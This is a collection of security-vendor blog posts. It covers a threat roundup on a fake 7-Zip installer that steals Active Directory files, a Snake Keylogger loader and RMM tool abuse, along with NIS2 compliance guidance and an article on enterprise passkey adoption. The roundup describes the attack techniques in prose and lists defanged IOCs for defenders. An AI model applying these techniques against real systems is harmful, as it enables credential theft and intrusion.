Fake 7-Zip installer exfiltrates Active Directory files 

Post on X 

A malicious installer disguised as 7-Zip steals critical Active Directory files, including ntds.dit and the SYSTEM hive, by leveraging shadow copies and exfiltrating the data to a remote server. 

Upon execution, the malware creates a shadow copy of the system drive to bypass file locks and extract protected files without disrupting system operations. It then copies ntds.dit, which contains Active Directory user and group data, and SYSTEM, which holds the corresponding encryption keys. 

The malware connects to a remote server via SMB using hardcoded credentials. All output is redirected to NUL to minimize traces. 

This technique grants the attacker full access to ntds.dit dump, allowing them to extract credentials for Active Directory objects and enables lateral movement techniques such as Pass-the-Hash or Golden Ticket. 
 
ANY.RUN’s Sandbox makes it easy to detect these stealthy operations by providing full behavioral visibility, from network exfiltration to credential staging, within a single interactive session. 

View an example of such session 

Malicious processes shaping the attack chain, visible in Sandbox analyses 

Look the malicious file up by its hash to analyze similar attacks and gather IOCs:  

sha256:”17a5512e09311e10465f432e1a093cd484bbd4b63b3fb25e6fbb1861a2a3520b” 

Samples with the same file in the Sandbox 

Control-Flow Flattening Obfuscated JavaScript Drops Snake Keylogger. 

Post On X 

As our data shows, banking is the most affected sector among our users, nearly matching all the other industries combined. As part of widespread MaaS phishing campaigns, Snake targets high-value industries including fintech, healthcare, and energy, making instant threat visibility and behavioral analysis essential. 

In this attack, the malware uses layered obfuscation to hide execution logic and evade traditional detection. 

See execution on a live system and download actionable report: 

Snake Keylogger analysis in ANY.RUN’s Sandbox 

The attack begins with a loader using control-flow flattening (MITRE T1027.010) to obscure its logic behind nested while-loops and string shifts. 
The loader uses COM automation via WshShell3, avoiding direct PowerShell or CMD calls and bypassing common detection rules.  

Obfuscated CMD scripts include non-ASCII (Japanese) characters and environment variables like %…%, further complicating static and dynamic analysis. 

Two CMD scripts are dropped into ProgramData to prepare the execution environment. This stage involves LOLBAS abuse: legitimate DLLs are copied from SysWOW64 into “/Windows /” and Public directories. The operation is performed using extrac32.exe, a known LOLBin and JS script functionality. This combination helps bypass detection by imitating trusted system behavior.  

Persistence is established by creating a Run registry key pointing to a .url file containing the execution path. Snake is launched after a short delay using a PING, staggering execution. 
 
Explore ANY.RUN’s threat database to proactively hunt for similar threats and techniques and improve the precision and efficiency of your organization’s security response. Here are several examples of Threat Intelligence Lookup search requests that allow to discover malware samples using the above-described TTPs:  

Lookup by registry modification artifacts 

IOCs:  

  • 54fcf77b7b6ca66ea4a2719b3209f18409edea8e7e7514cf85dc6bcde0745403  
  • ae53759b1047c267da1e068d1e14822d158e045c6a81e4bf114bd9981473abbd  
  • efd8444c42d4388251d4bc477fb712986676bc1752f30c9ad89ded67462a59a0  
  • Dbe81bbd0c3f8cb44eb45cd4d3669bd72bf95003804328d8f02417c2df49c481 
  • 183e98cd972ec4e2ff66b9503559e188a040532464ee4f979f704aa5224f4976 
  • reallyfreegeoip[.]org  
  • 104[.]21[.]96[.]1  
  • https[:]//reallyfreegeoip[.]org/xml/78[.]88[.]249[.]143  
  • registryValue: Iaakcppq.url 
Snake Keylogger attack chain 

Top 5 Remote Access Tools Exploited by Threat Actors in the First Half of 2025 

Post on X  

While legitimate and widely used by IT teams, Remote Monitoring and Management tools are increasingly used by threat actors to establish persistence, bypass defenses, and exfiltrate data. 
 
In the first half of 2025, ANY.RUN observed a significant number of malware samples leveraging known RMM software for malicious access. Here are the 5 most frequently abused tools illustrated with sandbox malware sample analyses: 

  • ScreenConnect – 3,829 sandbox analyses, view one
  • UltraVNC – 2,117 sandbox analyses, view one
  • PDQ Connect – 230 sandbox analyses, view one; 
  • Atera – 171 sandbox analyses, view one
RMM H1 2025 by Sandbox sample uploads 

To support faster detection and investigation, we’ve added the rmm-tool tag in Threat Intelligence Lookup, making it easier for threat hunters and incident responders to track RMM-based intrusions. Use the “threatName” search parameter to sort out sandbox sessions featuring remote access software and malware.  
 
threatName:”rmm-tool” 

Recent RMM abuse cases in the last 180 days 

Actionable Summary: From Visibility to Security 

The attacks we’ve reviewed this month showcase the growing sophistication and stealth of threat actors — from abusing LOLBins and fake installers to hijacking legitimate RMM tools. Detecting, understanding, and responding to such threats demands more than just static indicators. It requires deep behavioral insight and high-fidelity threat intelligence. 
 
View June’s top threats analysis to compare trends and scale your threat landscape understanding.  

ANY.RUN’s Interactive Sandbox empowers malware analysts to dissect the full attack chain, observe real payload execution, and uncover hidden behaviors without getting lost in obfuscation or waiting for post-mortem reports. You don’t just watch malware — you watch it work. 

Meanwhile, Threat Intelligence Lookup helps you connect the dots across thousands of similar cases: identify recurring tactics, extract IOC patterns, and enrich detection rules with real, contextualized data. Whether you’re tracing fake .lnk campaigns or hunting RMM-based persistence, it gives you a shortcut to actionable answers. 

As attackers get bolder, your investigation workflow has to get smarter — and faster. ANY.RUN is here to support both. 

About ANY.RUN 

ANY.RUN supports over 15,000 organizations across industries such as banking, manufacturing, telecommunications, healthcare, retail, and technology, helping them build stronger and more resilient cybersecurity operations.   

Designed to accelerate threat detection and improve response times, ANY.RUN equips teams with interactive malware analysis capabilities and real-time threat intelligence. 

Integrate ANY.RUN’s Threat Intelligence suite in your organization 

The post Major Cyber Attacks in July 2025: Obfuscated .LNK‑Delivered DeerStealer, Fake 7‑Zip, and More appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

Insights from Talos IR: Navigating NIS2 technical implementation

Insights from Talos IR: Navigating NIS2 technical implementation

When the NIS2 Directive arrived in 2023, organizations across Europe began preparing for enhanced cybersecurity requirements. Many focused on obligations such as rapid incident notifications and comprehensive security policies. However, while the directive provided the “what,” it left the “how” largely undefined. Organizations understood that they needed incident response capabilities and swift reporting mechanisms, but the details of implementation remained unclear.  

The release of ENISA’s Technical Implementation Guidance in June 2025 revealed the true complexity of compliance with the NIS2 standard. The technical guidance now reveals requirements that fundamentally challenge conventional security operations, particularly during incidents. Organizations that once prioritized operational continuity over forensic response and detailed analysis must now balance all three.

Competing objectives in incident response 

Under the old approach, organizations had the flexibility to isolate, investigate and report incidents at their own pace. These processes were typically be dictated by business needs, with exceptions for when personal data was involved under GDPR

Now, the clock starts ticking toward a 24-hour deadline from the moment an incident happens (Article 23 of the NIS2 Directive). 

The incident response procedures outlined in Section 3.5.2 of the ENISA guidance illustrate this shift perfectly. Security teams must now “recognize and address potential conflicts between forensic activities, incident response activities, and operational continuity.” The guidance explicitly acknowledges that teams face competing objectives: 

  1. Preserve evidence for legal purposes 
  2. Mitigate current threats to minimize business disruption 
  3. Minimize IT service downtime to maintain operational continuity 

Traditional incident response playbooks assume you can prioritize one or two of these objectives. NIS2 demands all three simultaneously. 

Let’s consider an example. A ransomware attack hits payment processing systems at midnight. According to Section 3.2.3, teams must maintain comprehensive logs including “all privileged access to systems and applications and activities performed by administrative accounts,” while Section 3.5.4 requires logging all incident response activities and recording evidence. At the same time, the business operations would require system restoration to process morning transactions so that the bottom line is not impacted.  

Throughout this process, someone must compile an initial report meeting the notification requirements within 24 hours as mandated by Article 23(3) of the NIS2 Directive. This is followed by a more detailed report with impact assessment details within 72 hours. Not to mention, organizations operating across borders may need country-specific procedures to support notification timelines.   

The guidance acknowledges the inherent conflict in these objectives and requires organizations to “establish a clear decision-making process that prioritizes based on the accepted risk tolerance levels, business impact and legal obligations.”

Logging requirements 

Another key challenge lies in the depth of logging requires. Section 3.2.3 specifies that logs shall include, where appropriate: “(a) relevant outbound and inbound network traffic; (b) creation, modification or deletion of users of the relevant entities’ network and information systems and extension of the permissions; (c) access to systems and applications; (d) authentication-related events; (e) all privileged access to systems and applications and activities performed by administrative accounts” as well as 7 additional categories, for 12 total. All this assumes visibility into shadow IT and appropriate configuration of user activity tracking so that a proper audit trail can be constructed, reviewed and stored for analysis.  

Furthermore, the guidance notes in Section 3.2.6 that monitoring and logging systems must be redundant, and that “the availability of the monitoring and logging systems shall be monitored independent of the systems they are monitoring.” Although this is music to an incident responder’s ears, setting up the complex systems needed to correlate, analyze, store and retrieve detailed audits is a significant challenge.

Forensic activities vs. business recovery 

Traditional incident response strategies often prioritize rapid recovery to ensure that business operations can return to normal while simultaneously analyzing evidence. Incident response teams often want to acquire all evidence upfront so that business recovery can begin alongside the forensic investigation. The business can also decide what to recover and even go as far as to simply make decision to rebuild the environment from scratch and thus accelerate recovery and eradication. 

Section 3.5.2 explicitly calls for creation of a playbook to ensure that evidence handling, incident response and threat eradication take place during appropriate stages of the business cycle. The playbook must manage tradeoffs so that there is no impact on preservation of evidence for compliance and legal purposes. 

In addition, Section 3.5.4 mandates that entities “log incident response activities” and “record evidence.” The guidance suggests this should include “time of detection, containment and eradication,” “indicators of compromise,” “root cause” and “actions taken during each phase.” To meet this requirement, organizations must develop procedures that capture this critical information while managing active incidents. Typically, incident response teams already do this when creating a detailed timeline of all activities. Close collaboration between business stakeholders and IR teams is a must for NIS2 compliance.

Looking beyond compliance 

While the guidance focuses on meeting technical requirements, organizations that implement these capabilities also gain broader operational benefits. For example, comprehensive logging not only satisfies compliance, but also supports threat hunting and delivers valuable operational insights. With these capabilities, IR teams can review the environment for malicious activities. Enhanced monitoring, especially when automated, can identify security incidents quicker and reduce adversary dwell time.  

Structured incident response procedures improve overall operational resilience by ensuring every team member knows what to do and when to act. Talos IR services directly align with these key ENISA Technical Implementation Guidance requirements, helping organizations bridge the gap between current capabilities and NIS2 compliance. 

Log Architecture Assessment (Section 3.2 Requirements) 

Section 3.2.3  mandates logging across 12 categories of events “where appropriate,” while Section 3.2.6 requires redundant logging systems with synchronized time sources. Talos IR’s Log Architecture Assessment evaluates current logging capabilities against best practices, identifying deficiencies and providing a roadmap to strengthen an organization’s logging posture. 

Incident Response Playbooks (Section 3.5.2 Requirements)  

Perhaps the most challenging aspect of the NIS2 is the explicit requirement for “incident response playbooks that incorporate decision making and escalation paths for managing trade-offs between evidence preservation, threat containment and operational continuity.” Talos IR develops customized playbooks that address these competing priorities, giving your team a clear process tailored for each incident type.  

Incident Response Plans (Section 3.1 and 3.5 Requirements) 

Section 3.1.1 requires establishing comprehensive “procedures for detecting, analyzing, containing or responding to, recovering from, documenting and reporting of incidents.” Talos IR helps organizations develop IR plans that reflect their internal processes and operational needs. 

Threat Hunting and Compromise Assessments (Section 3.4 Requirements) 

Section 3.4.1 requires organizations to assess “suspicious events to determine whether they constitute incidents.” Talos IR provides proactive Threat Hunting and Compromise Assessment services to identify suspicious events before they escalate into major incidents. We look to answer critical questions such as “Am I currently compromised?” or “Is there any evidence of historical compromise?” 

Incident Support (Section 3.6 Requirements) 

Talos IR provides 24/7 incident support to help organizations respond swiftly and effectively during emergencies. Our team engages quickly to understand the situation, address immediate concerns and analyze threats. In addition to deep forensic expertise, Talos IR provides comprehensive root cause analysis and actionable recommendations that transform each incident into an opportunity to strengthen the organization’s security posture.

Cisco Talos Blog – ​Read More

Are passkeys enterprise-ready? | Kaspersky official blog

Every major tech giant touts passkeys as an effective, convenient password replacement that can end phishing and credential leaks. The core idea is simple: you sign in with a cryptographic key that’s stored securely in a special hardware module on your device, and you unlock that key with biometrics or a PIN. We’ve already covered the current state of passkeys for home users in detail across two articles (on terminology and basic use cases and more complex scenarios. However, businesses have entirely different requirements and approaches to cybersecurity. So, how good are passkeys and FIDO2 WebAuthn in a corporate environment?

Reasons for companies to switch to passkeys

As with any large-scale migration, making the switch to passkeys requires a solid business case. On paper, passkeys tackle several pressing problems at once:

  • Lower the risk of breaches caused by stolen legitimate credentials — phishing resistance is the top advertised benefit of passkeys.
  • Strengthen defenses against other identity attacks, such as brute-forcing and credential stuffing.
  • Help with compliance. In many industries, regulators mandate the use of robust authentication methods for employees, and passkeys usually qualify.
  • Reduce costs. If a company opts for passkeys stored on laptops or smartphones, it can achieve a high level of security without the extra expense of USB devices, smart cards, and their associated management and logistics.
  • Boost employee productivity. A smooth, efficient authentication process saves every employee time daily and reduces failed login attempts. Switching to passkeys usually goes hand in hand with getting rid of the universally loathed regular password changes.
  • Lightens the helpdesk workload by decreasing the number of tickets related to forgotten passwords and locked accounts. (Of course, other types of issues pop up instead, such as lost devices containing passkeys.)

How widespread is passkey adoption?

A FIDO Alliance report suggests that 87% of surveyed organizations in the US and UK have either already transitioned to using passkeys or are currently in the process of doing so. However, a closer look at the report reveals that this impressive figure also includes the familiar enterprise options like smart cards and USB tokens for account access. Although some of these are indeed based on WebAuthn and passkeys, they’re not without their problems. They’re quite expensive and create an ongoing burden on IT and cybersecurity teams related to managing physical tokens and cards: issuance, delivery, replacement, revocation, and so on. As for the heavily promoted solutions based on smartphones and even cloud sync, 63% of respondents reported using such technologies, but the full extent of their adoption remains unclear.

Companies that transition their entire workforce to the new tech are few and far between. The process can get both organizationally challenging and just plain expensive. More often than not, the rollout is done in phases. Although pilot strategies may vary, companies typically start with those employees who have access to IP (39%), IT system admins (39%), and C-suite executives (34%).

Potential obstacles to passkey adoption

When an organization decides to transition to passkeys, it will inevitably face a host of technical challenges. These alone could warrant their own article. But for this piece, let’s stick to the most obvious issues:

  • Difficulty (and sometimes outright impossibility) of migrating to passkeys when using legacy and isolated IT systems — especially on-premises Active Directory
  • Fragmentation of passkey storage approaches within the Apple, Google, and Microsoft ecosystems, complicating the use of a single passkey across different devices
  • Additional management difficulties if the company allows the use of personal devices (BYOD), or, conversely, has strict prohibitions such as banning Bluetooth
  • Ongoing costs for purchasing or leasing tokens and managing physical devices
  • Specific requirement of non-syncable hardware keys for high-assurance-with-attestation scenarios (and even then, not all of them qualify — the FIDO Alliance provides specific recommendations on this)
  • Necessity to train employees and address their concerns about the use of biometrics
  • Necessity to create new, detailed policies for IT, cybersecurity, and the helpdesk to address issues related to fragmentation, legacy systems, and lost devices (including issues related to onboarding and offboarding procedures)

What do regulators say about passkeys?

Despite all these challenges, the transition to passkeys may be a foregone conclusion for some organizations if required by a regulator. Major national and industry regulators generally support passkeys, either directly or indirectly:

The NIST SP 800-63 Digital Identity Guidelines permit the use of “syncable authenticators” (a definition that clearly implies passkeys) for Authenticator Assurance Level 2, and device-bound authenticators for Authenticator Assurance Level 3. Thus, the use of passkeys confidently checks the boxes during ISO 27001, HIPAA, and SOC 2 audits.

In its commentary on DSS 4.0.1, the PCI Security Standards Council explicitly names FIDO2 as a technology that meets its criteria for “phishing-resistant authentication”.

The EU Payment Services Directive 2 (PSD2) is written in a technology-agnostic manner. However, it requires Strong Customer Authentication (SCA) and the use of Public Key Infrastructure based devices for important financial transactions, as well as dynamic linking of payment data with the transaction signature. Passkeys support these requirements.

The European directives DORA and NIS2 are also technology-agnostic, and generally only require the implementation of multi-factor authentication — a requirement that passkeys certainly satisfy.

In short, choosing passkeys specifically isn’t mandatory for regulatory compliance, but many organizations find it to be the most cost-effective path. Among the factors tipping the scales in favor of passkeys are the extensive use of cloud services and SaaS, an ongoing rollout of passkeys for customer-facing websites and apps, and a well-managed fleet of corporate computers and smartphones.

Enterprise roadmap for transitioning to passkeys

  1. Assemble a cross-functional team. This includes IT, cybersecurity, business owners of IT systems, tech support, HR, and internal communications.
  2. Inventory your authentication systems and methods. Identify where WebAuthn/FIDO2 is already supported, which systems can be upgraded, where single sign-on (SSO) integration can be implemented, where a dedicated service needs to be created to translate new authentication methods into ones your systems support, and where you’ll have to continue using passwords — under beefed-up SOC monitoring.
  3. Define your passkey strategy. Decide whether to use hardware security keys or passkeys stored on smartphones and laptops. Plan and configure your primary sign-in methods, as well as emergency access options such as temporary access passcodes (TAP).
  4. Update your corporate information security policies to reflect the adoption of passkeys. Establish detailed sign-up and recovery rules. Establish protocols for cases where transitioning to passkeys isn’t on the cards (for example, because the user must rely on a legacy device that has no passkey support). Develop auxiliary measures to ensure secure passkey storage, such as mandatory device encryption, biometrics use, and unified endpoint management or enterprise mobility management device health checks.
  5. Plan the rollout order for different systems and user groups. Set a long timeline to identify and fix problems step-by-step.
  6. Enable passkeys in access management systems such as Entra ID and Google Workspace, and configure allowed devices.
  7. Launch a pilot, starting with a small group of users. Collect feedback, and refine your instructions and approach.
  8. Gradually connect systems that don’t natively support passkeys using SSO and other methods.
  9. Train your employees. Launch a passkey adoption campaign, providing users with clear instructions and working with “champions” on each team to speed up the transition.
  10. Track progress and improve processes. Analyze usage metrics, login errors, and support tickets. Adjust access and recovery policies accordingly.
  11. Gradually phase out legacy authentication methods once their usage drops to single-digit rates. First and foremost, eliminate one-time codes sent through insecure communication channels, such as text messages and email.

Kaspersky official blog – ​Read More